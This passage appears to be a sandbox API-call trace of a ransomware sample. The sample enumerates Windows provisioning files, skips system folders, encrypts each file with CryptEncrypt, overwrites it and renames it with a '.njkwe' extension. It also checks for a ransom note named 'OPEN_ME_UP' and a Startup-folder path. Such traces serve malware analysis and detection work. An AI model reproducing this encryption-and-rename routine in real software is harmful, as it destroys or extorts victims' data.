lpOverlapped=0x0) returned 1 [0077.595] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.595] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.595] CloseHandle (hObject=0x43c) returned 1 [0077.595] GetProcessHeap () returned 0xbe0000 [0077.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.595] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\241__connections_cellular_libyana (libya)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\241__connections_cellular_libyana (libya)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.596] GetProcessHeap () returned 0xbe0000 [0077.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.596] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90922e60, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90922e60, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90922e60, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", cAlternateFileName="242__C~1.PRO")) returned 1 [0077.596] lstrcmpiW (lpString1="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.596] lstrcmpiW (lpString1="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.596] lstrcmpiW (lpString1="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.596] lstrcmpiW (lpString1="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.596] lstrcmpiW (lpString1="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.596] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml") returned 171 [0077.596] StrStrIW (lpFirst="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.596] lstrcmpW (lpString1="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.596] lstrcmpW (lpString1="242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.596] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\242__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.596] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\242__connections_cellular_a1 mobilkom (liechtenstein)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.596] GetTickCount () returned 0x1153bbd [0077.596] GetTickCount () returned 0x1153bbd [0077.596] GetTickCount () returned 0x1153bbd [0077.596] GetTickCount () returned 0x1153bbd [0077.596] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.597] GetProcessHeap () returned 0xbe0000 [0077.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.597] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.598] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.598] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.599] GetProcessHeap () returned 0xbe0000 [0077.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.599] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.599] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.599] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.599] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.599] CloseHandle (hObject=0x43c) returned 1 [0077.599] GetProcessHeap () returned 0xbe0000 [0077.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.599] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 191 [0077.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\242__connections_cellular_a1 mobilkom (liechtenstein)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\242__Connections_Cellular_A1 Mobilkom (Liechtenstein)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\242__connections_cellular_a1 mobilkom (liechtenstein)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.600] GetProcessHeap () returned 0xbe0000 [0077.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.600] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90922e60, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90922e60, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90922e60, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="243__C~1.PRO")) returned 1 [0077.600] lstrcmpiW (lpString1="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.600] lstrcmpiW (lpString1="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.600] lstrcmpiW (lpString1="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.600] lstrcmpiW (lpString1="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.600] lstrcmpiW (lpString1="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.600] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml") returned 168 [0077.601] StrStrIW (lpFirst="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.601] lstrcmpW (lpString1="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.601] lstrcmpW (lpString1="243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.601] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\243__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.601] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\243__connections_cellular_bitė lietuva (lithuania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.601] GetTickCount () returned 0x1153bbd [0077.601] GetTickCount () returned 0x1153bbd [0077.601] GetTickCount () returned 0x1153bbd [0077.601] GetTickCount () returned 0x1153bbd [0077.601] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.601] GetProcessHeap () returned 0xbe0000 [0077.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.601] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0077.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.604] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0077.604] GetProcessHeap () returned 0xbe0000 [0077.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.604] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.605] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.605] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.605] CloseHandle (hObject=0x43c) returned 1 [0077.605] GetProcessHeap () returned 0xbe0000 [0077.605] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.605] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0077.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\243__connections_cellular_bitė lietuva (lithuania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\243__Connections_Cellular_Bitė Lietuva (Lithuania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\243__connections_cellular_bitė lietuva (lithuania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.606] GetProcessHeap () returned 0xbe0000 [0077.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.606] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90922e60, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90922e60, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90922e60, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x302, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="244__C~1.PRO")) returned 1 [0077.606] lstrcmpiW (lpString1="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.606] lstrcmpiW (lpString1="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.606] lstrcmpiW (lpString1="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.606] lstrcmpiW (lpString1="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.606] lstrcmpiW (lpString1="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.606] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml") returned 163 [0077.606] StrStrIW (lpFirst="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.606] lstrcmpW (lpString1="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.606] lstrcmpW (lpString1="244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.606] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\244__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.606] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\244__connections_cellular_omnitel (lithuania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.606] GetTickCount () returned 0x1153bcd [0077.606] GetTickCount () returned 0x1153bcd [0077.606] GetTickCount () returned 0x1153bcd [0077.606] GetTickCount () returned 0x1153bcd [0077.606] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.607] GetProcessHeap () returned 0xbe0000 [0077.607] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.607] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x302, lpOverlapped=0x0) returned 1 [0077.609] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcfe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.609] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x302, lpOverlapped=0x0) returned 1 [0077.609] GetProcessHeap () returned 0xbe0000 [0077.610] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.610] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.610] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.610] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.610] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.611] CloseHandle (hObject=0x43c) returned 1 [0077.611] GetProcessHeap () returned 0xbe0000 [0077.611] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.611] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\244__connections_cellular_omnitel (lithuania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\244__Connections_Cellular_Omnitel (Lithuania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\244__connections_cellular_omnitel (lithuania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.612] GetProcessHeap () returned 0xbe0000 [0077.612] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.612] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909490d0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909490d0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909490d0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="245__C~1.PRO")) returned 1 [0077.612] lstrcmpiW (lpString1="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.612] lstrcmpiW (lpString1="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.612] lstrcmpiW (lpString1="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.612] lstrcmpiW (lpString1="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.612] lstrcmpiW (lpString1="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.613] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml") returned 161 [0077.613] StrStrIW (lpFirst="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.613] lstrcmpW (lpString1="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.613] lstrcmpW (lpString1="245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.613] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\245__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.613] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\245__connections_cellular_tele2 (lithuania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.613] GetTickCount () returned 0x1153bcd [0077.613] GetTickCount () returned 0x1153bcd [0077.613] GetTickCount () returned 0x1153bcd [0077.613] 